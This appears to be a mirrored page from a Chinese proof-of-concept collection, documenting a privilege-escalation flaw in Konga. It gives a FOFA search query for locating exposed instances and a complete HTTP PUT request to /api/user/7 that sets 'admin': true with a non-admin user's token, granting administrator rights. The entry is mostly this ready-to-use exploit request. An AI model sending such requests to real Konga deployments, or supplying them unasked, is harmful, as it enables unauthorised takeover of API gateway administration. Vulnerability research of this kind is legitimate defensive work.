admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Konga 普通用户越权获取管理员权限漏洞.md

70 lines
1.1 KiB
Markdown
Raw Normal View History

Web应用漏洞
2022-05-17 17:43:20 +08:00
# Konga 普通用户越权获取管理员权限漏洞
## 漏洞描述
Konga 普通用户通过发送特殊的请求可越权获取管理员权限
## 漏洞影响
```
Konga
```
## FOFA
```
"konga"
```
## 漏洞复现
登录页面
![image-20220210184626593](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101846658.png)
创建非管理员用户后登录并获取token
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101847245.png)
发送请求包, 将token修改为刚刚获取的
```plain
PUT /api/user/7 HTTP/1.1
Host: 127.0.0.1:1337
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 241
{
"admin": true,
"passports": {
"password": "1234abcd",
"protocol": "local"
},
"password_confirmation": "1234abcd",
"token": "non-administrator user token"
}
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101847809.png)
成功转为管理员用户
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101847129.png)
Reference in New Issue Copy Permalink